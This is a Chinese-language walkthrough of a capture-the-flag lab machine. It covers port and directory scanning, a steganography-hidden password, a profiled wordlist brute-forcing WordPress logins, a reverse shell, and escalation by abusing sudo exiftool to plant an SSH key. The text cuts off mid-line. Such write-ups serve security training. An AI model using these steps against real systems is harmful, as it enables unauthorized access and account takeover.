![\"image-20240428124106064\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037343.png\")
<\/div>\n
![\"image-20240428185102757\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037344.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ rustscan -a 192.168.0.139 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.139:80\nOpen 192.168.0.139:2121\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: OPTIONS HEAD GET POST\n|_http-title: Apache2 Ubuntu Default Page: It works\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n2121\/tcp open ftp syn-ack vsftpd 3.0.5\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to 192.168.0.143\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 4\n| vsFTPd 3.0.5 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r-- 1 0 0 11113 Jun 09 2023 facebook.jpg\n| -rw-r--r-- 1 0 0 35427 Jun 09 2023 github.jpg\n| -rw-r--r-- 1 0 0 88816 Jun 09 2023 instagram.jpg\n| -rw-r--r-- 1 0 0 27159 Jun 09 2023 linkedin.jpg\n| -rw-r--r-- 1 0 0 28 Jun 08 2023 note.txt\n|_-rw-r--r-- 1 0 0 124263 Jun 09 2023 snapchat.jpg<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.139\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.139\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,bak,jpg,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html (Status: 403) [Size: 278]\n\/index.html (Status: 200) [Size: 10671]\n\/.php (Status: 403) [Size: 278]\n\/wordpress (Status: 301) [Size: 318] [--> http:\/\/192.168.0.139\/wordpress\/]\n\/.html (Status: 403) [Size: 278]\n\/.php (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ curl http:\/\/192.168.0.139 | html2text\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n100 10671 100 10671 0 0 4249k 0 --:--:-- --:--:-- --:--:-- 5210k\n[Ubuntu Logo]\n Apache2 Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Ubuntu systems. It is based on the\nequivalent page on Debian, from which the Ubuntu Apache packaging is derived.\nIf you can read this page, it means that the Apache HTTP server installed at\nthis site is working properly. You should replace this file (located at \/var\/\nwww\/html\/index.html) before continuing to operate your HTTP server.\nIf you are a normal user of this web site and don't know what this page is\nabout, this probably means that the site is currently unavailable due to\nmaintenance. If the problem persists, please contact the site's administrator.\nConfiguration Overview\nUbuntu's Apache2 default configuration is different from the upstream default\nconfiguration, and split into several files optimized for interaction with\nUbuntu tools. The configuration system is fully documented in \/usr\/share\/doc\/\napache2\/README.Debian.gz. Refer to this for the full documentation.\nDocumentation for the web server itself can be found by accessing the manual if\nthe apache2-doc package was installed on this server.\nThe configuration layout for an Apache2 web server installation on Ubuntu\nsystems is as follows:\n\/etc\/apache2\/<\/code><\/pre>\n\u5c31\u662f\u666e\u901a\u754c\u9762\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fdb\u4e00\u6b65\u7684\u63a2\u7d22\u3002<\/p>\n
\u654f\u611f\u7aef\u53e3\u670d\u52a1<\/h3>\n
\u533f\u540d\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ftp 192.168.0.139 2121 \nConnected to 192.168.0.139.\n220 (vsFTPd 3.0.5)\nName (192.168.0.139:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls -la\n229 Entering Extended Passive Mode (|||16523|)\n150 Here comes the directory listing.\ndr-xr-xr-x 2 1000 65534 4096 Jun 09 2023 .\ndr-xr-xr-x 2 1000 65534 4096 Jun 09 2023 ..\n-rw-r--r-- 1 0 0 11113 Jun 09 2023 facebook.jpg\n-rw-r--r-- 1 0 0 35427 Jun 09 2023 github.jpg\n-rw-r--r-- 1 0 0 88816 Jun 09 2023 instagram.jpg\n-rw-r--r-- 1 0 0 27159 Jun 09 2023 linkedin.jpg\n-rw-r--r-- 1 0 0 28 Jun 08 2023 note.txt\n-rw-r--r-- 1 0 0 124263 Jun 09 2023 snapchat.jpg\n226 Directory send OK.\nftp> mget *.*\nmget facebook.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||26191|)\n150 Opening BINARY mode data connection for facebook.jpg (11113 bytes).\n100% |***********************************************************************************************************| 11113 634.68 KiB\/s 00:00 ETA\n226 Transfer complete.\n11113 bytes received in 00:00 (618.66 KiB\/s)\nmget github.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||15369|)\n150 Opening BINARY mode data connection for github.jpg (35427 bytes).\n100% |***********************************************************************************************************| 35427 39.28 MiB\/s 00:00 ETA\n226 Transfer complete.\n35427 bytes received in 00:00 (28.90 MiB\/s)\nmget instagram.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||56348|)\n150 Opening BINARY mode data connection for instagram.jpg (88816 bytes).\n100% |***********************************************************************************************************| 88816 2.38 MiB\/s 00:00 ETA\n226 Transfer complete.\n88816 bytes received in 00:00 (2.35 MiB\/s)\nmget linkedin.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||16758|)\n150 Opening BINARY mode data connection for linkedin.jpg (27159 bytes).\n100% |***********************************************************************************************************| 27159 1.40 MiB\/s 00:00 ETA\n226 Transfer complete.\n27159 bytes received in 00:00 (1.37 MiB\/s)\nmget note.txt [anpqy?]? \n229 Entering Extended Passive Mode (|||22962|)\n150 Opening BINARY mode data connection for note.txt (28 bytes).\n100% |***********************************************************************************************************| 28 0.94 KiB\/s 00:00 ETA\n226 Transfer complete.\n28 bytes received in 00:00 (0.92 KiB\/s)\nmget snapchat.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||8797|)\n150 Opening BINARY mode data connection for snapchat.jpg (124263 bytes).\n100% |***********************************************************************************************************| 121 KiB 2.44 MiB\/s 00:00 ETA\n226 Transfer complete.\n124263 bytes received in 00:00 (2.42 MiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u7136\u540e\u67e5\u770b\u4e00\u4e9b\u662f\u5426\u9690\u85cf\u4e86\u4e1c\u897f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ls -la\ntotal 300\ndrwxr-xr-x 2 kali kali 4096 Apr 28 06:55 .\ndrwxr-xr-x 81 kali kali 4096 Apr 28 06:48 ..\n-rw-r--r-- 1 kali kali 11113 Jun 9 2023 facebook.jpg\n-rw-r--r-- 1 kali kali 35427 Jun 9 2023 github.jpg\n-rw-r--r-- 1 kali kali 88816 Jun 9 2023 instagram.jpg\n-rw-r--r-- 1 kali kali 27159 Jun 9 2023 linkedin.jpg\n-rw-r--r-- 1 kali kali 28 Jun 8 2023 note.txt\n-rw-r--r-- 1 kali kali 124263 Jun 9 2023 snapchat.jpg\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ cat note.txt \n- Change wordpress password\n\n........\ntry and try\n........\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt snapchat.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: ""\n[i] Original filename: "backup.txt".\n[i] Extracting to "snapchat.jpg.out".\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ cat snapchat.jpg.out \nPASSWORD BACKUP\n---------------\n\nu3jkeg97gf<\/code><\/pre>\n\u6240\u4ee5\u5c1d\u8bd5\u8981\u4ece\u6700\u540e\u5f00\u59cb\u5c1d\u8bd5\uff01<\/p>\n
blog\u76ee\u5f55<\/h3>\n
\u53d1\u73b0\u4e86\u4e00\u4e2awordpress<\/code>\u76ee\u5f55\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ curl http:\/\/192.168.0.139\/wordpress\/ -s | html2text | uniq\n\nSkip_to_content\n\n***** Breaking *****\n\u00c2\u00a1Hello_world!\n****** My_new_blog! ******\n\n****** My_new_blog! ******\n\n * Home\n \u2070\n\nTest\n*** \u00c2\u00a1Hello_world! ***\nluna\n Jun_8,_2023 1_Comments\nMy name is Luna Shine, and I am thrilled to share my passion for fashion with\nall of you. Born on June 24, 1997, I have dedicated my life to\u2026\n\nSearch\n[Unknown INPUT type]Search\n***** Entradas recientes *****\n * \u00c2\u00a1Hello_world!\n***** Comentarios recientes *****\n 1. Admin on \u00c2\u00a1Hello_world!\n***** Archivos *****\n * June_2023\n***** Categor\u00c3\u00adas *****\n * Test\n\n***** You Missed *****\n>\nTest\n*** \u00c2\u00a1Hello_world! ***\n\nMy_new_blog!\nCopyright \u00a9 All rights reserved | BlogArise by Themeansar.\n\n Search for: [Unknown INPUT type] [Search]<\/code><\/pre>\n\u5f97\u5230\u7528\u6237Luna Shine<\/code>\uff0c\u751f\u65e56,24,1997<\/code>\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ whatweb http:\/\/192.168.0.139\/wordpress\/ \nhttp:\/\/192.168.0.139\/wordpress\/ [200 OK] Apache[2.4.52], Bootstrap[6.5.2], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.52 (Ubuntu)], IP[192.168.0.139], JQuery[3.7.1], MetaGenerator[WordPress 6.5.2], Script[text\/javascript], Title[My new blog!], UncommonHeaders[link], WordPress[6.5.2]<\/code><\/pre>\n\u770b\u6765\u6ca1\u5dee\u4e86\uff0c\u8fdb\u884cwpscan<\/code>\u626b\u63cf\uff1a<\/p>\n\u7528\u6237\u626b\u63cf<\/h4>\nwpscan --url http:\/\/192.168.0.139\/wordpress\/ -e u --api-token xxxxxxxx<\/code><\/pre>\n[i] User(s) Identified:\n\n[+] luna\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n | Rss Generator (Passive Detection)\n | Wp Json Api (Aggressive Detection)\n | - http:\/\/192.168.0.139\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&page=1\n | Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Login Error Messages (Aggressive Detection)<\/code><\/pre>\n\u63d2\u4ef6\u626b\u63cf<\/h4>\nwpscan --url http:\/\/192.168.0.139\/wordpress\/ -e p --api-token xxxxxxxx<\/code><\/pre>\n[+] Enumerating Most Popular Plugins (via Passive Methods)\n\n[i] No plugins Found.<\/code><\/pre>\n\u6ca1\u6709\u63d2\u4ef6\u6b38\u3002\u3002\u3002\u3002<\/p>\n
sql\u6ce8\u5165<\/h4>\n
\u5148\u6293\u4e2a\u5305\uff1a<\/p>\n
POST \/wordpress\/wp-login.php HTTP\/1.1\nHost: 192.168.0.139\nContent-Length: 117\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.0.139\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.0.139\/wordpress\/wp-login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=0epcnghs4sn67tv9sao8bni1li\nConnection: close\n\nlog=admin&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.139%2Fwordpress%2Fwp-admin%2F&testcookie=1<\/code><\/pre>\n\u5c1d\u8bd5\u6ce8\u5165\uff0c\u4f46\u662f\uff1a<\/p>\n
[CRITICAL] all tested parameters do not appear to be injectable.<\/code><\/pre>\n\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u7ee7\u7eed\u5c1d\u8bd5<\/h4>\n
\u5c1d\u8bd5\u4e00\u4e0b\u4e4b\u524d\u627e\u5230\u7684\u5bc6\u7801u3jkeg97gf<\/code>\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5b9a\u4e49\u5b57\u5178\u7206\u7834\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ python3 cupp.py -i \n ___________ \n cupp.py! # Common\n \\ # User\n \\ ,__, # Passwords\n \\ (oo)____ # Profiler\n (__) )\\ \n ||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]\n [ Mebus | https:\/\/github.com\/Mebus\/]\n\n[+] Insert the information about the victim to make a dictionary\n[+] If you don't know all the info, just hit enter when asked! ;)\n\n> First Name: luna\n> Surname: shine\n> Nickname: \n> Birthdate (DDMMYYYY): 24061997\n\n> Partners) name: \n> Partners) nickname: \n> Partners) birthdate (DDMMYYYY): \n\n> Child's name: \n> Child's nickname: \n> Child's birthdate (DDMMYYYY): \n\n> Pet's name: \n> Company name: \n\n> Do you want to add some key words about the victim? Y\/[N]: \n> Do you want to add special chars at the end of words? Y\/[N]: \n> Do you want to add some random numbers at the end of words? Y\/[N]:\n> Leet mode? (i.e. leet = 1337) Y\/[N]: \n\n[+] Now making a dictionary...\n[+] Sorting list and removing duplicates...\n[+] Saving dictionary to luna.txt, counting 2778 words.\n> Hyperspeed Print? (Y\/n) : n\n[+] Now load your pistolero with luna.txt and shoot! Good luck!<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ wpscan --url http:\/\/192.168.0.139\/wordpress\/ -e u -P \/home\/kali\/cupp\/luna.txt --api-token xxxxxxx\n_______________________________________________________________\n __ _______ _____\n \\ \\ \/ \/ __ \\ \/ ____|\n \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae\n \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n \\ \/\\ \/ | | ____) | (__| (_| | | | |\n \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.25\n Sponsored by Automattic - https:\/\/automattic.com\/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n[i] User(s) Identified:\n\n[+] luna\n | Found By: Author Posts - Author Pattern (Passive Detection)\n | Confirmed By:\n | Rss Generator (Passive Detection)\n | Wp Json Api (Aggressive Detection)\n | - http:\/\/192.168.0.139\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&page=1\n | Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Login Error Messages (Aggressive Detection)\n\n[+] Performing password attack on Wp Login against 1 user\/s\n[SUCCESS] - luna \/ luna_1997 \nTrying luna \/ luna_1997 Time: 00:00:38 <================================= > (2280 \/ 5058) 45.07% ETA: ??:??:??\n[!] Valid Combinations Found:\n | Username: luna, Password: luna_1997<\/code><\/pre>\n\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n
![\"image-20240428195122047\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u5199\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u968f\u4fbf\u8f93\u5165\u4e00\u4e2a\u76ee\u5f55\uff0c\u89e6\u53d1\u53cd\u5f39shell\uff0c\u4f46\u662f\u65e0\u6cd5\u8fdb\u884c\u89e6\u53d1\uff0c\u6362\u4e00\u4e2a\u53ef\u4ee5\u8bbf\u95ee\u7684\u8fdb\u884c\u89e6\u53d1\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@influencer:\/$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@influencer:\/$ ls -la\ntotal 2097228\ndrwxr-xr-x 19 root root 4096 Jun 8 2023 .\ndrwxr-xr-x 19 root root 4096 Jun 8 2023 ..\nlrwxrwxrwx 1 root root 7 Feb 17 2023 bin -> usr\/bin\ndrwxr-xr-x 4 root root 4096 Jun 8 2023 boot\ndrwxr-xr-x 20 root root 4080 Apr 28 10:49 dev\ndrwxr-xr-x 101 root root 4096 Jun 10 2023 etc\ndrwxr-xr-x 4 root root 4096 Jun 8 2023 home\nlrwxrwxrwx 1 root root 7 Feb 17 2023 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Feb 17 2023 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Feb 17 2023 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Feb 17 2023 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Jun 8 2023 lost+found\ndrwxr-xr-x 2 root root 4096 Feb 17 2023 media\ndrwxr-xr-x 2 root root 4096 Feb 17 2023 mnt\ndrwxr-xr-x 2 root root 4096 Feb 17 2023 opt\ndr-xr-xr-x 176 root root 0 Apr 28 10:49 proc\ndrwx------ 6 root root 4096 Jun 10 2023 root\ndrwxr-xr-x 32 root root 900 Apr 28 11:25 run\nlrwxrwxrwx 1 root root 8 Feb 17 2023 sbin -> usr\/sbin\ndrwxr-xr-x 6 root root 4096 Feb 17 2023 snap\ndrwxr-xr-x 3 root root 4096 Jun 8 2023 srv\n-rw------- 1 root root 2147483648 Jun 8 2023 swap.img\ndr-xr-xr-x 13 root root 0 Apr 28 10:49 sys\ndrwxrwxrwt 2 root root 4096 Apr 28 11:02 tmp\ndrwxr-xr-x 14 root root 4096 Feb 17 2023 usr\ndrwxr-xr-x 14 root root 4096 Jun 8 2023 var\n(remote) www-data@influencer:\/$ cat \/etc\/passwd | grep 'sh'\nroot:x:0:0:root:\/root:\/bin\/bash\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nluna:x:1000:1000:Luna Shine:\/home\/luna:\/bin\/bash\njuan:x:1001:1001:juan,,,:\/home\/juan:\/bin\/bash\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\n(remote) www-data@influencer:\/$ cd \/home\n(remote) www-data@influencer:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Jun 8 2023 .\ndrwxr-xr-x 19 root root 4096 Jun 8 2023 ..\ndrwx------ 2 juan juan 4096 Jun 9 2023 juan\ndrwx------ 4 luna luna 4096 Jun 9 2023 luna\n(remote) www-data@influencer:\/home$ cd juan\nbash: cd: juan: Permission denied\n(remote) www-data@influencer:\/home$ cd luna\/\nbash: cd: luna\/: Permission denied\n(remote) www-data@influencer:\/home$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/pkexec\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/18357\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/19361\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1891\/usr\/bin\/chfn\n\/snap\/core20\/1891\/usr\/bin\/chsh\n\/snap\/core20\/1891\/usr\/bin\/gpasswd\n\/snap\/core20\/1891\/usr\/bin\/mount\n\/snap\/core20\/1891\/usr\/bin\/newgrp\n\/snap\/core20\/1891\/usr\/bin\/passwd\n\/snap\/core20\/1891\/usr\/bin\/su\n\/snap\/core20\/1891\/usr\/bin\/sudo\n\/snap\/core20\/1891\/usr\/bin\/umount\n\/snap\/core20\/1891\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1891\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1822\/usr\/bin\/chfn\n\/snap\/core20\/1822\/usr\/bin\/chsh\n\/snap\/core20\/1822\/usr\/bin\/gpasswd\n\/snap\/core20\/1822\/usr\/bin\/mount\n\/snap\/core20\/1822\/usr\/bin\/newgrp\n\/snap\/core20\/1822\/usr\/bin\/passwd\n\/snap\/core20\/1822\/usr\/bin\/su\n\/snap\/core20\/1822\/usr\/bin\/sudo\n\/snap\/core20\/1822\/usr\/bin\/umount\n\/snap\/core20\/1822\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1822\/usr\/lib\/openssh\/ssh-keysign\n(remote) www-data@influencer:\/home$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n\/usr\/bin\/mtr-packet cap_net_raw=ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/snap\/core20\/1891\/usr\/bin\/ping cap_net_raw=ep\n\/snap\/core20\/1822\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@influencer:\/home$ ss -atlp\nState Recv-Q Send-Q Local Address:Port Peer Address:Port Process \nLISTEN 0 4096 127.0.0.53%lo:domain 0.0.0.0:* \nLISTEN 0 128 127.0.0.1:1212 0.0.0.0:* \nLISTEN 0 32 0.0.0.0:iprop 0.0.0.0:* \nLISTEN 0 80 127.0.0.1:mysql 0.0.0.0:* \nLISTEN 0 511 *:http *:* \n(remote) www-data@influencer:\/home$ nc 0.0.0.0 1212\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\n^C<\/code><\/pre>\n\u5207\u6362luna\u63d0\u6743juan<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u5207\u6362\uff0c\u770b\u770b\u5bc6\u7801\u662f\u5426\u8fdb\u884c\u4e86\u590d\u7528\uff1a<\/p>\n
luna_1997\nu3jkeg97gf<\/code><\/pre>\n<\/div><\/p>\nluna@influencer:~$ sudo -l\nMatching Defaults entries for luna on influencer:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser luna may run the following commands on influencer:\n (juan) NOPASSWD: \/usr\/bin\/exiftool<\/code><\/pre>\nhttps:\/\/gtfobins.github.io\/gtfobins\/exiftool\/#sudo<\/a><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u8bfb\u5199juan<\/code>\u7684ssh\u79c1\u94a5<\/code>\uff1a<\/p>\n<\/div><\/p>\nluna@influencer:~$ cd \/tmp\nluna@influencer:\/tmp$ touch id_rsa\nluna@influencer:\/tmp$ sudo \/usr\/bin\/exiftool id_rsa \/home\/juan\/.ssh\/id_rsa\n[sudo] password for luna: \nsudo: a password is required\nluna@influencer:\/tmp$ sudo -u juan \/usr\/bin\/exiftool id_rsa \/home\/juan\/.ssh\/id_rsa\n======== id_rsa\nExifTool Version Number : 12.40\nFile Name : id_rsa\nDirectory : .\nFile Size : 0 bytes\nFile Modification Date\/Time : 2024:04:28 12:15:57+00:00\nFile Access Date\/Time : 2024:04:28 12:15:57+00:00\nFile Inode Change Date\/Time : 2024:04:28 12:15:57+00:00\nFile Permissions : -rw-rw-r--\nError : File is empty\nError: File not found - \/home\/juan\/.ssh\/id_rsa\n 1 image files read\n 1 files could not be read<\/code><\/pre>\n\u989d\uff0c\u4e0d\u5b58\u5728\uff0c\u5c1d\u8bd5\u6dfb\u52a0\u4e00\u4e2a\u8fdb\u53bb\uff0c\u5148\u672c\u5730\u751f\u6210\u4e00\u5bf9\u5bc6\u94a5\u5bf9\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/Influencer\/juan\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/Influencer\/juan\nYour public key has been saved in \/home\/kali\/temp\/Influencer\/juan.pub\nThe key fingerprint is:\nSHA256:\/xMR+gJtJQiy8EhEtszHXYSkcsG5nJDhuiNWojzpqTk kali@kali\nThe key's randomart image is:\n+---[RSA 3072]----+\n| oB+ooo+o. |\n| *o*o*... . o |\n| BoBo. . + . |\n| . ++ . + . |\n|.. . So . . |\n|o.+ .. o |\n|== .. . |\n|Eoo .. |\n|++ .. |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.139 - - [28\/Apr\/2024 08:22:18] "GET \/juan HTTP\/1.1" 200 -\n192.168.0.139 - - [28\/Apr\/2024 08:22:22] "GET \/juan.pub HTTP\/1.1" 200 -<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743juan<\/code>\u7528\u6237\uff1a<\/p>\nluna@influencer:\/tmp$ wget http:\/\/192.168.0.143:8888\/juan\n--2024-04-28 12:22:19-- http:\/\/192.168.0.143:8888\/juan\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 2590 (2,5K) [application\/octet-stream]\nSaving to: \u2018juan\u2019\n\njuan 100%[=========================================================================>] 2,53K --.-KB\/s in 0s \n\n2024-04-28 12:22:19 (276 MB\/s) - \u2018juan\u2019 saved [2590\/2590]\n\nluna@influencer:\/tmp$ wget http:\/\/192.168.0.143:8888\/juan.pub\n--2024-04-28 12:22:23-- http:\/\/192.168.0.143:8888\/juan.pub\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 563 [application\/vnd.exstream-package]\nSaving to: \u2018juan.pub\u2019\n\njuan.pub 100%[=========================================================================>] 563 --.-KB\/s in 0s \n\n2024-04-28 12:22:23 (107 MB\/s) - \u2018juan.pub\u2019 saved [563\/563]\n\nluna@influencer:\/tmp$ mv juan.pub authorized_keys\nluna@influencer:\/tmp$ sudo -u juan exiftool -filename=\/home\/juan\/.ssh\/authorized_keys authorized_keys \nWarning: Error removing old file - authorized_keys\n 1 directories created\n 1 image files updated\nluna@influencer:\/tmp$ sudo -u juan exiftool -filename=\/home\/juan\/.ssh\/authorized_keys authorized_keys \nError: '\/home\/juan\/.ssh\/authorized_keys' already exists - authorized_keys\n 0 image files updated\n 1 files weren't updated due to 